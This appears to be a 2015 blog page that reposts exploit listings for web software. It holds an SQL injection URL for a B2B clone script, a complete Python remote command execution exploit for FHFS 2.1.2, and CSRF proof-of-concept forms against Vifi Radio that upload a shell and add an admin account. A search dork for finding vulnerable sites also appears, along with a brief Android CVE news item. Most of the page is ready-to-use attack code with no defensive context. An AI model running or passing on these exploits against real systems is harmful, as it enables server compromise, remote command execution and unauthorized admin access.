Monday, 31 August 2015

Alibaba Clone B2B Script SQL Injection Vulnerability

Description:
# Exploit Title: Alibaba Clone B2B Script Sql Injection All Versions 
# Date: 2015-08-31 
# Exploit Author: Meisam Monsef meisamrce
# Vendor Homepage: http://www.superbscripts.com/ 
# Version: All Versions 
# Tested on: CentOS and Windows 

POC:
/contactuser.html?es_type=4&es_id=

EXPLOIT:
http://site.com/contactuser.html?es_type=4&es_id=-9999+[sql+command]+%23


DEMO:


Friday, 28 August 2015

Seowonintech Routers all device remote root exploit

SEOWONINTECH ALL DEVICE REMOTE ROOT EXPLOIT

Exploit:
http://www.exploit4arab.net/exploits/1701

FHFS Server 2.1.2 Remote Exploit: Server Compromise

FHFS - FTP/HTTP File Server 2.1.2 Remote Exploit

Server compromise
FHFS - FTP/HTTP SERVER 2.1.2
REMOTE COMMAND EXECUTION EXPLOIT


Exploit:
#!/usr/bin/python
#
# FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution
#
# Author: Naser Farhadi
#
# Date: 26 August 2015
# Version: 2.1.2
# Tested on: Windows 7 SP1 (32 bit)
#
#
# Description : FHFS is a FTP and HTTP Web Server package,
#               transparently based on HFS and FileZilla. FHFS is built to act as an all-in-one user-based file hosting website,
#               good for schools, businesses, etc. whose students/employees need to easily transport files.
# Usage:
#       chmod +x FHFS.py
#       ./FHFS.py
##
  
import socket
  
url = raw_input("Enter URL : ")
try:
      while True:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((url, 80))
            cmd = raw_input("Enter command (E.g. calc) or press Ctrl+C to exit : ")
            req = "GET /?{.exec|"+cmd+".}"
            req += " HTTP/1.1\r\n\r\n"
            sock.send(req)
            sock.close()
            print "Done!"
except KeyboardInterrupt:
      print "Bye!"


Thursday, 27 August 2015

Monday, 24 August 2015

New vulnerabilities on Android devices

New vulnerabilities on Android devices have been discovered (CVE-2015-3842)
that allow your device to be compromised and all of its information stolen, including
data, private information and even messages.
Investigators have also indicated that it is even possible to place calls.
For more information:

http://thehackernews.com/2015/08/hacking-android-smartphones.html




Saturday, 22 August 2015

Vifi Radio v1 - CSRF Vulnerability

############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Vifi Radio
|~Affected Version : v1
|~Official Demo :  http://radyo.vifibilisim.com
|~RISK : Medium
|~DORK : inurl:index.asp?radyo=2
|~Tested On : [L] Windows 7, Mozilla Firefox
########################################################

Upload.HTML

----------------------------------------------------------- 

<td width="796" valign="top"><form name="form1" method="post" action="http://[TARGET]/yonetim/djtek_yukle.asp?upload=true&haber=56" enctype="multipart/form-data" onSubmit="checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG');return document.MM_returnValue">

<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td class="baslik"> CSRF with Tamper Data Shell Upload PoC </td>
</tr> <tr>
<td height="125" align="center" class="menu"><input type="file" name="fmfile" style="width:200px" class="main">
<input name="fmsubmit" type="submit" class="main" value="Y&Uuml;KLE" /></td>
                         
</tr></table></form></td></tr></table></td></tr> 
----------------------------------------------------------
 PoC
----------------------------------------------------------
<html>
  <body>
    <form action="http://[TARGET]/yonetim/kullanici-kaydet.asp?tur=g" method="POST">
      <input type="hidden" name="rutbe" value="1" />
      <input type="hidden" name="djadi" value="0" />
      <input type="hidden" name="resim" value="Vifi+Bili%FEim" />
      <input type="hidden" name="firma" value="USERNAME" />
      <input type="hidden" name="link" value="PASSWORD" />
      <input type="hidden" name="sira" value="23" />
      <input type="hidden" name="ilet" value="G%D6NDER" />
      <input type="hidden" name="Submit" value="Exploit!" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
############################
"Admin Panel: /yonetim "
############################
EXPLOIT: http://0day.today/exploit/24101